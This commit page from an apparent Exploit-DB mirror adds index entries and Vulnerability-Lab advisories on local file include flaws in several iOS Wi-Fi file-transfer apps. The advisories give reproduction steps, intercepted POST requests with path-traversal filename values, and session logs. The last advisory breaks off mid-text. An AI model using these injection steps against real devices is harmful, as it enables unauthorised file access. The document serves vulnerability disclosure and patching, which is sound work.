bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_05_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-05 04:36:35 +00:00
parent e6f333a7b5
commit e97b490546
19 changed files with 2069 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -18087,7 +18087,7 @@ id,file,description,date,author,platform,type,port
20812,platforms/windows/remote/20812.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0
20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0
20814,platforms/windows/remote/20814.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,remote,0
20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - .printer ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2)",2001-05-01,"dark spyrit",windows,remote,0
20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3)",2005-02-02,styx,windows,remote,0
20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4)",2001-05-01,"Cyrus The Great",windows,remote,0
@ -30295,3 +30295,20 @@ id,file,description,date,author,platform,type,port
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0
33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability",2010-02-11,"Grzegorz Stachowiak",php,dos,0
33626,platforms/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",php,webapps,80
33627,platforms/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080
33628,platforms/ios/webapps/33628.txt,"Files Desk Pro v1.4 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8081
33629,platforms/ios/webapps/33629.txt,"Privacy Pro v1.2 HZ iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,56380
33630,platforms/ios/webapps/33630.txt,"TigerCom My Assistant 1.1 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080
33631,platforms/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080
33632,platforms/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080
33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software 'index.php' SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0
33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0
33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 'callback.snipshot.php' Arbitrary File Creation Vulnerability",2010-02-03,"Cory Marsh",php,webapps,0
33637,platforms/php/webapps/33637.txt,"Webee Comments Component 1.1/1.2 for Joomla! index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0
33638,platforms/php/webapps/33638.txt,"Webee Comments Component 1.1/1.2 for Joomla! Multiple BBCode Tags XSS",2009-11-15,"Jeff Channell",php,webapps,0
33639,platforms/php/webapps/33639.txt,"Joomla! EasyBook 2.0.0rc4 Component Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
33640,platforms/windows/dos/33640.py,"AIMP <= 2.8.3 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2010-02-12,Molotov,windows,dos,0
33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 Local File Include and Cross Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0

Can't render this file because it is too large.

208
platforms/ios/webapps/33627.txt Executable file
View file

@ -0,0 +1,208 @@
Document Title:
===============
NG WifiTransfer Pro 1.1 - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1260
Release Date:
=============
2014-04-28
Vulnerability Laboratory ID (VL-ID):
====================================
1260
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
The easiest way to transfer files between iPhones or with computers! WifiTransfer enables fast wireless file transfer between
iPhones or with computers with a simple scan. WifiTransfer enables simple and ultra fast file transfer between iPhones over
Wi-Fi networks. Without any additional setup, just a QRCode scan will do. The target iPhone doesn`t have to install WifiTransfer.
An iPhone with an ARBITRARY scanner will do. (However, with WifiTransfer installed on the target iPhone, you will have better
control on the transfer process.) In addition to transfer files between iPhone/iPad, you can also remotely manage files on your
iPhone right from your desktop computer. Supported browsers: Safari, Chrome, FireFox, Internet Explorer.
(Copy of the Homepage: https://itunes.apple.com/us/app/wifitransfer-pro-instant-file/id802094784 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Notable Group WifiTransfer Pro v1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-04-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Notable Group
Product: WifiTransfer Pro - iOS Mobile Application 1.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Notable Group WifiTransfer Pro v1.1 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs
in the `WifiTransfer File Management` listing context. The attacker is able to inject the local file include request by usage of the
`wifi interface` or by a local privileged application user account via `file sync`(app).
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different
local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security
risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST] - Remote
[+] [SYNC] - Local
Vulnerable Module(s):
[+] WifiTransfer File Management (UI)
Vulnerable Function(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by attackers without privileged application user account and low user interaction.
For security demonstration or to reproduce the file include web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the vulnerable wifi ios software app (https://itunes.apple.com/us/app/wifitransfer-pro-instant-file/id802094784)
2. Start the server and activate the localhost wifi server
3. Open the wifi interface in a browser or console > http://localhost:8080/
4. The the directory button to choose a file for a upload
5. Activate a session tamper to capture the request information to intercept
6. Click the upload button and inject your own path/file request inside of the filename value
7. Open the interface in the browser and the execution occurs in the file dir item listing context
8. Successful reproduce of the security vulnerability via wifi user interface!
Note: The inject is also possible via sync
1. Add a file in the device app interface
2. Inject the path request as payload in combination with script code and save
3. Activate the localhost wifi interface (web-server)
4. Open the interface in the browser and the execution occurs in the file dir item listing context
5. Successful reproduce of the security vulnerability via app sync!
PoC:
<table class="table table-hover" cellpadding="0" cellspacing="0" border="0">
<thead>
<tr><th>Name</th><th class="del">Action</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href="/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png" class="file"><img src="img/image.png" style="vertical-align:middle;"><span><./-[LOCAL FILE INCLUDE VULNERABILITY!].png.png</span></a></td><td class='del'><div><a href='/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png' class='btn btn-info btn-sm'>Download</a><form action='/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png' method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value=" Delete " class='btn btn-danger btn-sm' /></div></td></tr></tbody></table></iframe></span></a></td></tr></tbody>
</table>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------2128355697111
Content-Disposition: form-data; name="newfile"; filename="./-[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Reference(s):
http://localhost:8080/
http://localhost:8080/files
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable filename input value in the upload POST method request.
Filter and encode also the name value output in the wifi interface file dir listing.
Setup a restriction of the filename input and disallow data names with special chars.
Security Risk:
==============
The security risk of the local file include web vulnerability in the wifi interface is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

285
platforms/ios/webapps/33628.txt Executable file
View file

@ -0,0 +1,285 @@
Document Title:
===============
Files Desk Pro v1.4 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1266
Release Date:
=============
2014-05-16
Vulnerability Laboratory ID (VL-ID):
====================================
1266
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
FileDesk is iPhone/iPad app for managing your files. Read differect kind of files,Create PDFs with different contents, Make your
documents/files private,Share Your files over WiFi. File Desk - A digital desk for your files. Manage your Documents/Files With File Desk.
(Copy of the Homepage: https://itunes.apple.com/ag/app/file-desk-pro-documents-manager/id600550320 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Files Desk Pro v1.4 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-05-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
LiveBird Technologies Private Limited
Product: Files Desk Pro & Lite 1.4
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Files Desk Pro v1.4 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files
with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path
include execution occcurs in the `index file dir` list of the `filesdesk` manager. The attacker is able to inject the local file
include request by usage of the `wifi interface` or by a local privileged application user accounts via `file sync`(app).
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to
execute different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the
request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high with a
cvss (common vulnerability scoring system) count of 6.7.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user
account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application
or connected device component compromise.
Request Method(s):
[+] [POST] - Remote
[+] [SYNC] - Local
Vulnerable Module(s):
[+] FilesDesk Wifi (UI)
Vulnerable Function(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8081/)
Proof of Concept (PoC):
=======================
The local file/path include web vulnerability can be exploited local attackers without privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce ...
1. Install the FileDesk mobile application to your iOS device (ipad or iphone)
2. Start the local wifi web-server and share some random files
3. Connect with another remote computer to the local web-server interface url > web.localhost:8081
4. Start a session tamper and choose a random file to upload
5. Submit the upload form and intercept in the session to change the vulnerable filename value to a local device file/path
Note: Can also be combined with script codes and html tags
6. Refresh the index and the execution of the malicious request occurs in the index file dir list (name value)
7. Successful reproduce of the file include web vulnerability!
PoC: FilesDesk Index
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href="/files/%3C[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png" class="file"><[LOCAL FILE/PATH INCLUDE
VULNERABILITY!]">.png</a></td><td class='del'><form action='/files/%3C[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png'
method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button'
/></td></tr></tbody></table></iframe></a></td></tr></tbody>
</table>
Vulnerable Source: Upload Script
<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?"+ now.toString(),
function(data){
var shadow = false;
$.each(data, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = encodeURI(item.name).replace("'", "'");
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td
class='del'><form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=
\"commit\" type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
shadow = !shadow;
});
});
</script>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://192.168.2.104:8081/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[192.168.2.104:8081]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8081/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------147491436412682
Content-Disposition: form-data; name="newfile"; filename="%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Status: 200[OK]
GET http://192.168.2.104:8081/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2953] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8081]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8081/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[2953]
Date[Do., 15 Mai 2014 14:27:35 GMT]
Status: 200[OK]
GET http://192.168.2.104:8081/files?Thu%20May%2015%202014%2016:14:57%20GMT+0200 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[39] Mime Type[text/plain]
Request Header:
Host[192.168.2.104:8081]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://192.168.2.104:8081/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[39]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Do., 15 Mai 2014 14:27:37 GMT]
Status: 200[OK]
GET http://192.168.2.104:8081/%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8081]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8081/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Do., 15 Mai 2014 14:27:38 GMT]
Reference(s):
http://web.localhost:8081/[x]
http://web.localhost:8081/files
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the filename value in the upload POST method request.
Disallow special chars for files and foldernames and restrict the user input. Encode and parse also the vulnerable name output value.
Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

197
platforms/ios/webapps/33629.txt Executable file
View file

@ -0,0 +1,197 @@
Document Title:
===============
Privacy Pro v1.2 HZ iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1267
Release Date:
=============
2014-05-23
Vulnerability Laboratory ID (VL-ID):
====================================
1267
Common Vulnerability Scoring System:
====================================
6.6
Product & Service Introduction:
===============================
First of all,you need to enter the password two times that means to enter the password and confirm password,please remember the password, so as
to avoid unnecessary trouble. Personal information manager can provide personal information service personal for you, and provide the password
verification to ensure the privacy and security of your, include private account, video, pictures, books, telephone, recording, encryption and
decryption , memos and other functions, and the personal information manager can support WiFi data backup and recovery, we hope it can give
quite a lot convenient to your life.
( Copy of the Homepage: https://itunes.apple.com/de/app/privacy-account-video-picture/id790084948 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Privacy Pro v1.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-05-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Huang Zhuan
Product: Privacy [Account Video Picture Books Record] - iOS Mobile Web Application 1.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Privacy Pro v1.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs not like regular in the index list but inside of the upload formular message filename context. The attacker is able
to inject the local file include request by usage of the `wifi interface`. The affected service inside of the application is only the
privacy manager `wifi revover data` module. (localhost:56380 -restore)
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 6.6. Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application
user account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or
connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WiFi Restore Data
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:56380/)
Proof of Concept (PoC):
=======================
The local file/path include web vulnerability can be exploited by local network attackers with low user interaction. For security demonstration or
to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Source
<html><head></head><body>../.[FILE/PATH INCLUDE VULNERABILITY!] Upload successfully!</body></html>
--- PoC Session Logs [POST] ---
POST http://localhost:56380/upload Load Flags[LOAD_ONLY_FROM_CACHE LOAD_FROM_CACHE VALIDATE_NEVER LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[-1] Mime Type[unbekannt]
Request Header:
Host[localhost:56380]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:56380/index.html]
POST-Daten:
POST_DATA[-----------------------------57581386217946
Content-Disposition: form-data; name="upload_file"; filename="../.[LOCAL FILE/PATH INCLUDE VULNERABILITY!].jpg"
Content-Type: image/jpg
Response Header:
Status: 200[OK]
GET http://192.168.2.104:56380/index.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1084] Mime Type[text/html]
Request Header:
Host[192.168.2.104:56380]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Content-Length[1084]
Content-Type[text/html]
Reference(s):
http://localhost:56380/index.html (Wifi Restore Data)
http://localhost:56380/upload (Vulnerable File)
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the upload notification message context and input value.
Restrict the upload input and validate the context next to the data restore.
Security Risk:
==============
The security risk of the local file/path include web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

220
platforms/ios/webapps/33630.txt Executable file
View file

@ -0,0 +1,220 @@
Document Title:
===============
TigerCom My Assistant v1.1 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1268
Release Date:
=============
2014-05-23
Vulnerability Laboratory ID (VL-ID):
====================================
1268
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Folder manager, Convenient transmission, Document browsing, Compression & Decompression, Password-protected.
- Support multi-level directory management
- Add new folder
- Open camera, store photos and recording video
- Photos and video high fidelity storage
- Import photos and videos from album
- Export photos and videos to your album
- Copy, paste, delete, Email attachments
- Support multiple files operation
- Support sorting by name and type
- Icon shows file type
Convenient transmission:
- Wifi Transmission, you can share files between iphone, ipad and computer
- Current open folder sharing, better protect your privacy
- USB transfer and share files via Itunes
Document browsing:
- Txt document browsing and editing (txt)
- PDF document browsing (pdf)
- Word browsing (doc, docx)
- Excel browsing (xls, xlsx)
- PowerPoint browsing (ppt, pptx)
- Picture browsing (png, jpg, jpeg, jpe)
- Video player (mov, mp4, m4v, mpv, 3pg)
- Audio player (mp3, wav, aif)
Safty:
- Intelligent encryption, protect the folder
- Password-protected switch
( Copy of the Homepage: https://itunes.apple.com/en/app/my-assistant-free/id626680229 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official TigerCom My Assistant v1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-05-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
TigerCom
Product: My Assistant Free 1.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official TigerCom My Assistant v1.1 iOS mobile web-application.
